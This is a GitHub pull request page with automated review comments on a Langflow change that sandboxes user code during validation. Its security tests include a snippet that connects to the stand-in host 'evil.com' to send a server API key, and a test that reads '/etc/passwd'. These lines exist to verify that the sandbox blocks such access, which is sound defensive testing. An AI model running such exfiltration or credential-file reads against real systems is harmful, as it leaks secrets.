feat(security): add configurable security levels for importing trusted builtins / modules#10696
jordanrfrazier wants to merge 44 commits into
Important: Review skipped
Auto incremental reviews are disabled on this repository. Please check the settings in the CodeRabbit UI.
Walkthrough
This PR introduces a security sandbox for isolated Python code execution that blocks dangerous operations and modules by default, adds IBM watsonx.ai embedding model support with provider-specific configuration, and includes comprehensive security and integration tests. A new global setting controls whether dangerous code operations are permitted during validation.
Sequence Diagram(s)
sequenceDiagram
participant User as User Code
participant Val as validate.py
participant Sand as sandbox.py
participant Builtins as Isolated Builtins
participant Imports as Isolated Imports
User->>Val: compile code snippet
Val->>Val: create exec_globals
Val->>Sand: execute_in_sandbox(code_obj, exec_globals)
Sand->>Builtins: create_isolated_builtins()
Sand->>Imports: create_isolated_import()
note over Sand: Prepare isolated environment
Sand->>Sand: merge safe exec_globals
Sand->>Sand: set __builtins__ to isolated
Sand->>Sand: set __name__ and other attrs
rect rgba(255, 200, 0, 0.2)
note over Sand: Execute compiled code with isolation
Sand->>User: exec(code_obj, isolated_globals)
end
alt Code attempts dangerous operation
Builtins-->>Sand: raise SecurityViolation
Sand-->>Val: SecurityViolation caught
Val-->>User: validation fails
else Code is safe
User->>Imports: import langflow
Imports-->>User: allowed (in safe list)
Sand-->>Val: execution completes
Val-->>User: validation succeeds
end
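The flow in the diagram above can be sketched roughly as follows. This is a minimal illustration under stated assumptions, not the PR's actual `sandbox.py`: the function and exception names come from the diagram, while the block lists (`BLOCKED_BUILTINS`, `BLOCKED_MODULES`) and the `"__sandbox__"` module name are hypothetical. Replacing `__builtins__` in this way limits accidental access but is not a hardened security boundary on its own.

```python
import builtins

# Hypothetical block lists for illustration; the PR's real lists may differ.
BLOCKED_BUILTINS = {"open", "eval", "exec", "compile", "input"}
BLOCKED_MODULES = {"os", "sys", "subprocess", "socket"}


class SecurityViolation(Exception):
    """Raised when sandboxed code attempts a blocked operation."""


def _blocked(name):
    """Return a stand-in callable that always raises SecurityViolation."""
    def raiser(*args, **kwargs):
        raise SecurityViolation(f"builtin '{name}' is blocked")
    return raiser


def create_isolated_import():
    """Build an __import__ replacement that rejects blocked modules."""
    real_import = builtins.__import__

    def isolated_import(name, globals=None, locals=None, fromlist=(), level=0):
        if name.split(".")[0] in BLOCKED_MODULES:
            raise SecurityViolation(f"module '{name}' is blocked")
        return real_import(name, globals, locals, fromlist, level)

    return isolated_import


def create_isolated_builtins():
    """Copy the real builtins, swapping dangerous entries for raisers."""
    isolated = {k: v for k, v in vars(builtins).items() if k not in BLOCKED_BUILTINS}
    for name in BLOCKED_BUILTINS:
        isolated[name] = _blocked(name)
    isolated["__import__"] = create_isolated_import()
    return isolated


def execute_in_sandbox(code_obj, exec_globals):
    """Run a compiled code object in a fresh namespace with isolated builtins."""
    isolated_globals = dict(exec_globals)  # merge caller-provided globals
    isolated_globals["__builtins__"] = create_isolated_builtins()
    isolated_globals["__name__"] = "__sandbox__"
    exec(code_obj, isolated_globals)
    return isolated_globals
```

A caller would compile the snippet first (for example `compile(source, "<user>", "exec")`) and treat a raised `SecurityViolation` as a validation failure.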
sequenceDiagram
participant Client as Client Request
participant API as /api/v1/validate/code
participant Handler as Validation Handler
participant Sandbox as Sandbox Executor
participant Config as Settings
Client->>API: POST user_code
API->>Config: check allow_dangerous_code_validation
rect rgba(100, 200, 100, 0.2)
note over Config: Default: False (block dangerous)
end
API->>Handler: validate(code, dangerous_allowed=False)
Handler->>Handler: parse AST
Handler->>Sandbox: execute imports in sandbox
Handler->>Sandbox: execute functions in sandbox
alt Dangerous operation detected
rect rgba(255, 100, 100, 0.2)
Sandbox-->>Handler: SecurityViolation
Handler-->>API: 422 validation error
end
else Safe code
rect rgba(100, 200, 100, 0.2)
Sandbox-->>Handler: execution succeeds
Handler-->>API: 200 validation passed
end
end
API-->>Client: response
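The request flow in the second diagram can be approximated without any web framework. The sketch below is an assumption-laden illustration: `Settings`, `handle_validate_request`, and `toy_sandbox_runner` are hypothetical names, and the runner is a static AST stand-in for the real sandbox executor, used only to show how the flag and the 422/200 mapping fit together.

```python
import ast
from dataclasses import dataclass


class SecurityViolation(Exception):
    """Raised when validation hits a blocked operation."""


@dataclass
class Settings:
    # Mirrors the flag named in the diagram; the default blocks dangerous code.
    allow_dangerous_code_validation: bool = False


def toy_sandbox_runner(code, dangerous_allowed):
    """Stand-in for the sandbox: rejects 'import os' unless explicitly allowed."""
    for node in ast.walk(ast.parse(code)):
        if isinstance(node, ast.Import) and not dangerous_allowed:
            if any(alias.name.split(".")[0] == "os" for alias in node.names):
                raise SecurityViolation("import of 'os' is blocked")


def handle_validate_request(code, settings, runner=toy_sandbox_runner):
    """Return a (status_code, body) pair like the endpoint in the diagram."""
    try:
        runner(code, dangerous_allowed=settings.allow_dangerous_code_validation)
    except SecurityViolation as exc:
        return 422, {"detail": str(exc)}
    except SyntaxError as exc:
        return 422, {"detail": f"syntax error: {exc.msg}"}
    return 200, {"detail": "validation passed"}
```

With default settings, `handle_validate_request("import os", Settings())` yields a 422 response, while the same code passes when the flag is enabled.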
Estimated code review effort: 🎯 4 (Complex) | ⏱️ ~50 minutes
Pre-merge checks and finishing touches
❌ Failed checks (1 error, 3 warnings)
✅ Passed checks (3 passed)
Codecov Report
❌ Patch coverage is
❌ Your project check has failed because the head coverage (40.47%) is below the target coverage (60.00%). You can increase the head coverage or adjust the target coverage.
Additional details and impacted files
@@ Coverage Diff @@
## main #10696 +/- ##
==========================================
- Coverage 33.38% 33.10% -0.28%
==========================================
Files 1399 1403 +4
Lines 66331 66470 +139
Branches 9794 9812 +18
==========================================
- Hits 22142 22003 -139
- Misses 43065 43336 +271
- Partials 1124 1131 +7
Actionable comments posted: 9
🧹 Nitpick comments (2)
src/lfx/src/lfx/custom/validate.py (1)
74-85: Function definition now executed in sandbox: verify expectations for decorator/default-arg errors
Executing each FunctionDef via execute_in_sandbox with _create_langflow_execution_context() is a good way to catch definition-time errors (decorators, default args, annotations) without exposing server state. Just be aware this will also surface SecurityViolation (e.g., if decorators/imports inside the function hit blocked modules) through the generic except Exception path and report them as function["errors"]. Confirm that this mapping and logging ("Error executing function code") matches what the validate API and UI expect for blocked operations vs regular runtime errors.
src/backend/tests/unit/api/v1/test_validate.py (1)
183-209: Clean up W293 blank lines in docstrings for third-party-libs test.
Ruff reports W293 Blank line contains whitespace at line 184. That's the whitespace-only line inside this docstring:
"""Test that third-party libraries (not in a whitelist) can be imported.

Users should be able to import legitimate third-party libraries like AI libraries,
...
"""
You can fix it by stripping the whitespace from that line or by removing the line:
- """Test that third-party libraries (not in a whitelist) can be imported.
-
- Users should be able to import legitimate third-party libraries like AI libraries,
+ """Test that third-party libraries (not in a whitelist) can be imported.
+ Users should be able to import legitimate third-party libraries like AI libraries,
Same pattern applies to the docstrings around Lines 252 and 280; see next comment.
📜 Review details
Configuration used: Path: .coderabbit.yaml
Review profile: CHILL
Plan: Pro
⛔ Files ignored due to path filters (1)
uv.lock is excluded by !**/*.lock
📒 Files selected for processing (7)
src/backend/tests/unit/api/v1/test_validate.py (1 hunks)
src/backend/tests/unit/utils/test_validate.py (1 hunks)
src/lfx/src/lfx/custom/sandbox.py (1 hunks)
src/lfx/src/lfx/custom/validate.py (2 hunks)
src/lfx/src/lfx/services/settings/base.py (1 hunks)
src/lfx/tests/unit/custom/test_sandbox_isolation.py (1 hunks)
src/lfx/tests/unit/custom/test_sandbox_security.py (1 hunks)
🧰 Additional context used
🧬 Code graph analysis (5)
src/lfx/src/lfx/custom/validate.py (1)
src/lfx/src/lfx/custom/sandbox.py (3)
create_isolated_import (140-173)
execute_in_sandbox (176-239)
isolated_import (149-171)
src/lfx/src/lfx/custom/sandbox.py (1)
src/backend/base/langflow/interface/importing/utils.py (1)
import_module(7-32)
src/lfx/tests/unit/custom/test_sandbox_isolation.py (1)
src/lfx/src/lfx/custom/sandbox.py (1)
execute_in_sandbox(176-239)
src/lfx/tests/unit/custom/test_sandbox_security.py (1)
src/lfx/src/lfx/custom/sandbox.py (1)
execute_in_sandbox(176-239)
src/backend/tests/unit/api/v1/test_validate.py (1)
src/backend/tests/conftest.py (1)
logged_in_headers(507-513)
🪛 GitHub Actions: Ruff Style Check
src/backend/tests/unit/api/v1/test_validate.py
[error] 101-101: Ruff: E501 Line too long (131 > 120). Line exceeds maximum line length.
🪛 GitHub Check: Ruff Style Check (3.13)
src/lfx/src/lfx/custom/sandbox.py
[failure] 16-16: Ruff (N818)
src/lfx/src/lfx/custom/sandbox.py:16:7: N818 Exception name SecurityViolation should be named with an Error suffix
[failure] 13-13: Ruff (UP035)
src/lfx/src/lfx/custom/sandbox.py:13:1: UP035 typing.Set is deprecated, use set instead
[failure] 13-13: Ruff (UP035)
src/lfx/src/lfx/custom/sandbox.py:13:1: UP035 typing.Dict is deprecated, use dict instead
src/backend/tests/unit/api/v1/test_validate.py
[failure] 280-280: Ruff (W293)
src/backend/tests/unit/api/v1/test_validate.py:280:1: W293 Blank line contains whitespace
[failure] 268-268: Ruff (E501)
src/backend/tests/unit/api/v1/test_validate.py:268:121: E501 Line too long (127 > 120)
[failure] 252-252: Ruff (W293)
src/backend/tests/unit/api/v1/test_validate.py:252:1: W293 Blank line contains whitespace
[failure] 184-184: Ruff (W293)
src/backend/tests/unit/api/v1/test_validate.py:184:1: W293 Blank line contains whitespace
[failure] 134-134: Ruff (F841)
src/backend/tests/unit/api/v1/test_validate.py:134:5: F841 Local variable result is assigned to but never used
[failure] 133-133: Ruff (E501)
src/backend/tests/unit/api/v1/test_validate.py:133:121: E501 Line too long (121 > 120)
[failure] 101-101: Ruff (E501)
src/backend/tests/unit/api/v1/test_validate.py:101:121: E501 Line too long (131 > 120)
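For the N818 and UP035 findings above, one possible shape of the fix is sketched below. It is illustrative only: the `SecurityViolation` alias and the `group_by_top_level` helper are hypothetical and not taken from the PR; they just show an `Error`-suffixed exception name and built-in generics replacing `typing.Set` / `typing.Dict`.

```python
from __future__ import annotations


class SecurityViolationError(Exception):
    """Exception name carries the Error suffix that N818 asks for."""


# Hypothetical backward-compatible alias so existing call sites keep working.
SecurityViolation = SecurityViolationError


def group_by_top_level(modules: set[str]) -> dict[str, set[str]]:
    """Group dotted module names by top-level package, using built-in generics (UP035)."""
    grouped: dict[str, set[str]] = {}
    for name in modules:
        grouped.setdefault(name.split(".")[0], set()).add(name)
    return grouped
```

Whether an alias is worth keeping depends on how widely the old name is already imported; renaming outright is the simpler option for a new module.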
🪛 Gitleaks (8.29.0)
src/lfx/tests/unit/custom/test_sandbox_security.py
[high] 30-30: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.
(generic-api-key)
[high] 66-66: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.
(generic-api-key)
⏰ Context from checks skipped due to timeout of 90000ms. You can increase the timeout in your CodeRabbit configuration to a maximum of 15 minutes (900000ms). (13)
- GitHub Check: Lint Backend / Run Mypy (3.13)
- GitHub Check: Lint Backend / Run Mypy (3.10)
- GitHub Check: Lint Backend / Run Mypy (3.11)
- GitHub Check: Lint Backend / Run Mypy (3.12)
- GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 5
- GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 4
- GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 1
- GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 2
- GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 3
- GitHub Check: Run Backend Tests / Integration Tests - Python 3.10
- GitHub Check: Run Backend Tests / LFX Tests - Python 3.10
- GitHub Check: Test Starter Templates
- GitHub Check: Update Component Index
🔇 Additional comments (2)
src/backend/tests/unit/utils/test_validate.py (1)
70-76: Typed function example looks consistent with sandboxed validation
Using from typing import List, Optional plus json/math inside process_data aligns with _create_langflow_execution_context (which seeds List/Optional into exec_globals), so annotation evaluation and import checks should pass without introducing new edge cases.
src/lfx/src/lfx/services/settings/base.py (1)
339-349: Config flag aligns with sandbox env var; verify it's actually wired through
Adding allow_dangerous_code_validation: bool = False with the LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION env mapping is consistent with the sandbox's documented toggle. However, the sandbox currently appears to read the env var directly, while this Settings field is not obviously used to drive ALLOW_DANGEROUS_CODE. Please confirm that:
- Setting this field (or the env var) actually affects the sandbox behavior used by /api/v1/validate/code, and
- There's no divergence between the value in Settings and the value the sandbox module uses at import time.
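One way to avoid the divergence described above is to resolve the flag at call time instead of caching it at import. The sketch below is an assumption, not the PR's code: `dangerous_code_allowed` and the accepted truthy strings are hypothetical, while the env var and field names are the ones quoted in the comment.

```python
import os

ENV_VAR = "LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION"
_TRUTHY = {"1", "true", "yes"}  # assumed set of accepted truthy strings


def dangerous_code_allowed(settings=None, environ=None):
    """Resolve the flag on every call so runtime changes are picked up.

    Prefers an explicit settings object; falls back to the environment.
    """
    if settings is not None:
        return bool(settings.allow_dangerous_code_validation)
    env = os.environ if environ is None else environ
    return env.get(ENV_VAR, "").strip().lower() in _TRUTHY
```

The sandbox would call this helper each time it executes code, which keeps the Settings value and the sandbox's view of the flag in agreement at the cost of one lookup per validation.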
# Simulate server secrets stored in Python variables
server_api_key = "sk-secret-key-12345"
server_db_password = "db_password_secret"
server_config = {
    "api_key": server_api_key,
    "database_url": "postgresql://user:password@localhost/db"
}
Hard‑coded “API key”‑like test strings will keep tripping secret scanners
Strings like "sk-secret-key-12345", "sk-secret-12345", and "sk-secret-key-to-exfiltrate" look like real API keys to tools such as gitleaks, which is already flagging them. Even though they’re harmless test values, they’ll continue to generate noise or block CI unless suppressed.
A low-friction fix is to tweak them so they no longer match common key patterns, e.g.:
- "sk-test-not-a-real-key-12345"
- "dummy-secret-key"
or similar, or centralize them in a constant that scanners are configured to ignore.
Also applies to: 64-69, 100-102, 144-145, 175-177, 229-231
🧰 Tools
🪛 Gitleaks (8.29.0)
[high] 30-30: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.
(generic-api-key)
Actionable comments posted: 9
Caution
Some comments are outside the diff and can’t be posted inline due to platform limitations.
⚠️ Outside diff range comments (1)
src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json (1)
2338-2355: Unsafe default: Allow Dangerous Deserialization is enabled.
Defaulting allow_dangerous_deserialization to true can lead to arbitrary code execution when loading FAISS indexes. For a starter template, ship it disabled.
- BoolInput(
-     name="allow_dangerous_deserialization",
-     display_name="Allow Dangerous Deserialization",
-     ...
-     value=True,
- ),
+ BoolInput(
+     name="allow_dangerous_deserialization",
+     display_name="Allow Dangerous Deserialization",
+     ...
+     value=False,
+ ),
If you must load untrusted indexes, gate this behind an environment flag and warn prominently in the UI.
🧹 Nitpick comments (6)
src/backend/tests/unit/utils/test_validate.py (1)
54-151: Consider adding dedicated sandbox security tests.
The PR introduces a security sandbox to block dangerous operations, but this test file doesn't appear to include tests that specifically verify sandbox blocking behavior. Consider adding tests for:
Blocked operations - Verify that dangerous operations are blocked:
- File system access (open(), os.remove(), os.system())
- Subprocess execution (subprocess.run(), os.popen())
- Network operations (socket, urllib, requests)
- Module imports (__import__, importlib with dangerous modules)
Allowed operations - Verify safe operations still work:
- Standard math/string operations
- Safe stdlib modules (math, json, typing, etc.)
Global setting - The AI summary mentions "a new global setting controls whether dangerous code operations are permitted during validation." Add tests to verify:
- Setting can enable/disable dangerous operations
- Setting is respected by validation logic
Error handling - Verify appropriate errors are raised when blocked operations are attempted
Example test structure:
class TestSandboxSecurity:
    """Test cases for sandbox security restrictions."""

    def test_blocks_file_operations(self):
        """Test that file operations are blocked in sandbox."""
        code = '''
def dangerous_func():
    with open('/etc/passwd', 'r') as f:
        return f.read()
'''
        result = validate_code(code)
        errors = str(result["function"]["errors"]).lower()
        assert len(result["function"]["errors"]) > 0
        assert "blocked" in errors or "not allowed" in errors

    def test_allows_safe_operations(self):
        """Test that safe operations are allowed."""
        code = '''
import math
import json
def safe_func(x):
    return json.dumps({"result": math.sqrt(x)})
'''
        result = validate_code(code)
        assert result["imports"]["errors"] == []
        assert result["function"]["errors"] == []
src/lfx/src/lfx/services/settings/base.py (1)
339-349: Config flag wiring for dangerous validation looks consistent
The new allow_dangerous_code_validation flag is sane: defaulting to False, clearly documented, and aligned with env_prefix="LANGFLOW_" so LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION works as described. One thing to be aware of: the sandbox currently reads this env var once at import time, so changing this setting at runtime via Settings won't affect ALLOW_DANGEROUS_CODE without a restart. If you expect dynamic toggling, wiring the sandbox flag through Settings (or re-reading on demand) would help; otherwise this behavior is fine as a static boot-time switch.
src/lfx/tests/unit/custom/test_sandbox_security.py (3)
3-13: Clarify relationship between namespace isolation and dangerous-code flag
The module docstring currently states that sandboxed code can access filesystem, env, network, and commands without qualification, but execute_in_sandbox is documented as blocking these by default unless LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true is set. It would be clearer (and less misleading for future readers) to explicitly mention that this "CAN access" behavior assumes the dangerous-code flag is enabled, and that by default those operations are blocked while namespace isolation still applies.
217-237: Avoid real outbound network connections in tests
In test_sandbox_cannot_exfiltrate_secrets_via_network, the sandboxed code calls:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('evil.com', 1337))
s.send(server_api_key.encode())
Even though you intend a NameError on server_api_key, the socket.connect happens before that lookup, so the test will attempt a real outbound TCP connection to evil.com. This can make tests slow, flaky, or surprising in constrained CI environments.
You can keep the exfiltration intent while avoiding actual network calls by reordering or simplifying:
-def test():
-    # Code CAN make network requests
-    # But code CANNOT access server_api_key to send
-    # If isolation is broken, we could do: socket.send(server_api_key.encode())
-    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-    s.connect(('evil.com', 1337))
-    s.send(server_api_key.encode())  # Try to send server secret
-    s.close()
-    return 'sent'
+def test():
+    # Code COULD make network requests, but here we focus on the secret access.
+    # The NameError on server_api_key should occur before any actual network I/O.
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    # No real connect; just reference the would-be secret.
+    s.send(server_api_key.encode())  # Try to send server secret
+    s.close()
+    return 'sent'
This still proves that sandboxed code cannot obtain server_api_key, without touching the network.
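The ordering argument above can be checked without any socket at all. The following is a small sketch, not the PR's test: `RecordingSocket`, `SANDBOXED_SOURCE`, and `run_isolated` are hypothetical names, and a plain `exec` into a fresh namespace stands in for `execute_in_sandbox`. Python evaluates call arguments before invoking the method, so the `NameError` is raised before `send` ever runs.

```python
class RecordingSocket:
    """Fake socket that records calls instead of doing network I/O."""

    def __init__(self):
        self.calls = []

    def send(self, data):
        self.calls.append(("send", data))
        return len(data)

    def close(self):
        self.calls.append(("close",))


# Host-side "secret"; a dummy value that should not be visible to the snippet.
server_api_key = "dummy-secret-key"

SANDBOXED_SOURCE = """
def test(sock):
    sock.send(server_api_key.encode())  # argument lookup fails before send runs
    sock.close()
    return 'sent'
"""


def run_isolated(sock):
    """Exec the snippet in a fresh namespace; return the NameError text, if any."""
    namespace = {}  # host globals (including server_api_key) are not passed in
    exec(SANDBOXED_SOURCE, namespace)
    try:
        namespace["test"](sock)
    except NameError as exc:
        return str(exc)
    return None
```

After `run_isolated(sock)` returns, an empty `sock.calls` list confirms that nothing was sent, which is the property the reviewed test is after.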
252-285: Test name/docstring don't match behavior in test_sandbox_cannot_access_imported_server_modules_state
The test name and docstring say it verifies that sandboxed code “gets fresh module instances, not server’s module state”, but the inline comments and assertion now acknowledge that json is actually shared and only check that result is a str. As written, the test does not meaningfully validate isolation of imported module state.
Either:
- Align the behavior with the name/docstring, e.g. assert that result reflects unmodified json.dumps, or
- Rename the test and update comments to describe the actual property you care about (e.g., “sandbox can import and use json even if server mutates it; isolation is about Python variables, not module state”), and simplify the setup.
Cleaning this up will make the security guarantees and limitations around module-level state much clearer for future maintainers.
src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json (1)
2231-2249: Guardrail: validate truncate_input_tokens before passing to SDK.
Prevent invalid/negative values from reaching the IBM params.
Within build_embeddings IBM branch:
- params = {
-     EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS: self.truncate_input_tokens,
+ safe_trunc = max(0, int(self.truncate_input_tokens or 0))
+ params = {
+     EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS: safe_trunc,
      EmbedTextParamsMetaNames.RETURN_OPTIONS: {"input_text": self.input_text},
  }
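The guardrail suggested above can also be factored into a small helper that tolerates non-numeric input, which the one-line `int(...)` version would reject with an exception. This is a sketch under assumptions: `safe_truncate_tokens` and its `default` parameter are hypothetical and not part of the component.

```python
def safe_truncate_tokens(value, default=0):
    """Coerce a user-supplied token limit to a non-negative int.

    Falls back to `default` for None or values that cannot be parsed as int.
    """
    try:
        tokens = int(value) if value is not None else default
    except (TypeError, ValueError):
        tokens = default
    return max(0, tokens)
```

In the IBM branch, the result would replace `self.truncate_input_tokens` when building `params`; whether 0 is an acceptable fallback for the SDK is something to confirm against the watsonx.ai documentation.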
📜 Review details
Configuration used: Path: .coderabbit.yaml
Review profile: CHILL
Plan: Pro
⛔ Files ignored due to path filters (1)
uv.lock is excluded by !**/*.lock
📒 Files selected for processing (8)
src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json (5 hunks)
src/backend/tests/unit/api/v1/test_validate.py (1 hunks)
src/backend/tests/unit/utils/test_validate.py (1 hunks)
src/lfx/src/lfx/custom/sandbox.py (1 hunks)
src/lfx/src/lfx/custom/validate.py (2 hunks)
src/lfx/src/lfx/services/settings/base.py (1 hunks)
src/lfx/tests/unit/custom/test_sandbox_isolation.py (1 hunks)
src/lfx/tests/unit/custom/test_sandbox_security.py (1 hunks)
🧰 Additional context used
🧬 Code graph analysis (3)
src/lfx/tests/unit/custom/test_sandbox_isolation.py (1)
src/lfx/src/lfx/custom/sandbox.py (1)
execute_in_sandbox(179-242)
src/lfx/tests/unit/custom/test_sandbox_security.py (1)
src/lfx/src/lfx/custom/sandbox.py (1)
execute_in_sandbox(179-242)
src/lfx/src/lfx/custom/validate.py (1)
src/lfx/src/lfx/custom/sandbox.py (3)
create_isolated_import (142-176)
execute_in_sandbox (179-242)
isolated_import (152-174)
🪛 GitHub Actions: Ruff Style Check
src/backend/tests/unit/api/v1/test_validate.py
[error] 139-139: F841 Local variable result is assigned to but never used.
🪛 GitHub Check: Ruff Style Check (3.13)
src/backend/tests/unit/api/v1/test_validate.py
[failure] 139-139: Ruff (F841)
src/backend/tests/unit/api/v1/test_validate.py:139:5: F841 Local variable result is assigned to but never used
src/lfx/src/lfx/custom/sandbox.py
[failure] 161-162: Ruff (EM102)
src/lfx/src/lfx/custom/sandbox.py:161:21: EM102 Exception must not use an f-string literal, assign to variable first
[failure] 160-163: Ruff (TRY003)
src/lfx/src/lfx/custom/sandbox.py:160:23: TRY003 Avoid specifying long messages outside the exception class
[failure] 135-135: Ruff (EM102)
src/lfx/src/lfx/custom/sandbox.py:135:34: EM102 Exception must not use an f-string literal, assign to variable first
[failure] 135-135: Ruff (TRY003)
src/lfx/src/lfx/custom/sandbox.py:135:19: TRY003 Avoid specifying long messages outside the exception class
[failure] 129-129: Ruff (E501)
src/lfx/src/lfx/custom/sandbox.py:129:121: E501 Line too long (121 > 120)
[failure] 129-129: Ruff (EM102)
src/lfx/src/lfx/custom/sandbox.py:129:21: EM102 Exception must not use an f-string literal, assign to variable first
[failure] 128-130: Ruff (TRY003)
src/lfx/src/lfx/custom/sandbox.py:128:23: TRY003 Avoid specifying long messages outside the exception class
[failure] 105-108: Ruff (SIM105)
src/lfx/src/lfx/custom/sandbox.py:105:13: SIM105 Use contextlib.suppress(AttributeError) instead of try-except-pass
[failure] 17-17: Ruff (N818)
src/lfx/src/lfx/custom/sandbox.py:17:7: N818 Exception name SecurityViolation should be named with an Error suffix
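The EM102, TRY003, and SIM105 findings above usually share one remedy: move message formatting into the exception class and replace try-except-pass with `contextlib.suppress`. The sketch below is illustrative only; the constructor signature and the `strip_attribute` helper are hypothetical, not the PR's code.

```python
import contextlib


class SecurityViolationError(Exception):
    """Builds its own message, so raise sites stay short (TRY003, EM102)."""

    def __init__(self, kind, name):
        self.kind = kind
        self.name = name
        msg = f"{kind} '{name}' is blocked by the sandbox"
        super().__init__(msg)


def strip_attribute(obj, name):
    """Delete an attribute if present; a missing attribute is not an error (SIM105)."""
    with contextlib.suppress(AttributeError):
        delattr(obj, name)
```

A raise site then reads `raise SecurityViolationError("module", "os")`, with no f-string literal inside the `raise` statement.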
🪛 Gitleaks (8.29.0)
src/lfx/tests/unit/custom/test_sandbox_security.py
[high] 29-29: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.
(generic-api-key)
[high] 63-63: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.
(generic-api-key)
⏰ Context from checks skipped due to timeout of 90000ms. You can increase the timeout in your CodeRabbit configuration to a maximum of 15 minutes (900000ms). (4)
- GitHub Check: Run Frontend Tests / Playwright Tests - Shard 27/40
- GitHub Check: Test Docker Images / Test docker images
- GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 1
- GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 4
🔇 Additional comments (4)
src/backend/tests/unit/utils/test_validate.py (1)
70-75: Clarify test coverage inconsistency and file path.
The script output confirms that the sandbox implementation blocks dangerous operations (file I/O, network, subprocess) by default, with an environment variable LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION available to override this behavior.
However, I cannot locate the specific file path src/backend/tests/unit/utils/test_validate.py in the sandbox-related test results. The script output shows comprehensive sandbox tests at src/lfx/tests/unit/custom/test_sandbox_security.py and src/lfx/tests/unit/custom/test_sandbox_isolation.py, plus API endpoint tests at src/backend/tests/unit/api/v1/test_validate.py.
The tests at src/backend/tests/unit/api/v1/test_validate.py (lines 84, 108) explicitly verify that dangerous operations ARE blocked by default, which aligns with the change at lines 70-75 to use safe imports. If tests at other line ranges in a utils test file still reference os/sys without apparent sandbox restrictions, they may be:
- Testing exception scenarios where blocking is expected
- Running under an environment with the override flag enabled
- Testing different code paths than the validate endpoint
Please confirm:
- Is the file path src/backend/tests/unit/utils/test_validate.py correct, or has it been reorganized?
- What do tests at lines 126-134, 270-276, 501-510 verify: sandbox blocking behavior or success cases?
src/lfx/src/lfx/custom/validate.py (1)
11-12: Sandbox integration in validate_code looks solid
Using create_isolated_import for both ast.Import and ast.ImportFrom and then running each FunctionDef through execute_in_sandbox with a constrained Langflow execution context gives you:
- Blocked dangerous modules at import time (surfaced as structured import errors),
- Definition-time evaluation (decorators / default args) inside the sandbox, and
- No leakage of server globals or real __builtins__ into user code.
The _create_langflow_execution_context fallback stubs also keep validation robust when optional Langflow modules aren't importable. Overall this wiring matches the intended security model of the /validate/code endpoint and looks correct.
Also applies to: 51-88, 93-150
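The three properties listed above can be seen in a compact sketch. It is an assumption-based illustration rather than the PR's `validate.py`: the block list is hypothetical, a single `isolated_import` function stands in for `create_isolated_import`, and the result shape follows the `imports` / `function` error lists quoted elsewhere in this review. Each top-level import or function definition is compiled and executed on its own, so definition-time failures land in the matching bucket.

```python
import ast
import builtins

BLOCKED_MODULES = frozenset({"os", "subprocess", "socket"})  # hypothetical list


class SecurityViolation(Exception):
    """Raised when user code imports a blocked module."""


def isolated_import(name, globals=None, locals=None, fromlist=(), level=0):
    """Reject blocked modules, otherwise defer to the real import machinery."""
    if name.split(".")[0] in BLOCKED_MODULES:
        raise SecurityViolation(f"import of '{name}' is blocked")
    return builtins.__import__(name, globals, locals, fromlist, level)


def _run_node(node, namespace):
    """Compile a single top-level statement and execute it in `namespace`."""
    module = ast.Module(body=[node], type_ignores=[])
    exec(compile(module, "<validate>", "exec"), namespace)


def validate_code(code):
    """Collect import-time and definition-time errors without calling user functions."""
    result = {"imports": {"errors": []}, "function": {"errors": []}}
    try:
        tree = ast.parse(code)
    except SyntaxError as exc:
        result["function"]["errors"].append(str(exc))
        return result

    safe_builtins = dict(vars(builtins))
    safe_builtins["__import__"] = isolated_import
    # Fresh namespace: no server globals, and builtins with the guarded import.
    namespace = {"__builtins__": safe_builtins, "__name__": "__sandbox__"}

    for node in tree.body:
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            bucket = "imports"
        elif isinstance(node, ast.FunctionDef):
            bucket = "function"
        else:
            continue
        try:
            _run_node(node, namespace)
        except Exception as exc:  # includes SecurityViolation
            result[bucket]["errors"].append(f"{type(exc).__name__}: {exc}")
    return result
```

Because function bodies are never called, only decorators, default arguments, and annotations are evaluated, which matches the definition-time scope described in the comment.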
src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json (2)
2018-2019: All IBM SDK and LangChain-IBM signatures verified as correct.
The web search confirms that your code correctly uses:
- Credentials(api_key=..., url=...) with ibm_watsonx_ai 1.4.x
- EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS and RETURN_OPTIONS.input_text for text embedding parameters
- WatsonxEmbeddings with model_id, params, watsonx_client (pre-built APIClient), and project_id in langchain-ibm 0.3.19
All parameters and signatures match the documented patterns for the versions pinned in your dependencies.
1859-1866: Dependency versions verified and consistent.
Verification confirms all declared versions (requests 2.32.5, ibm_watsonx_ai 1.4.2, langchain_ibm 0.3.19) are:
- Properly pinned in the JSON starter project configuration
- Consistent with pyproject.toml constraints (requests>=2.32.0, ibm-watsonx-ai>=1.3.1,<2.0.0, langchain-ibm>=0.3.8)
- Mutually compatible with no conflicts detected
- Compatible with project's Python requirement (>=3.10,<3.14)
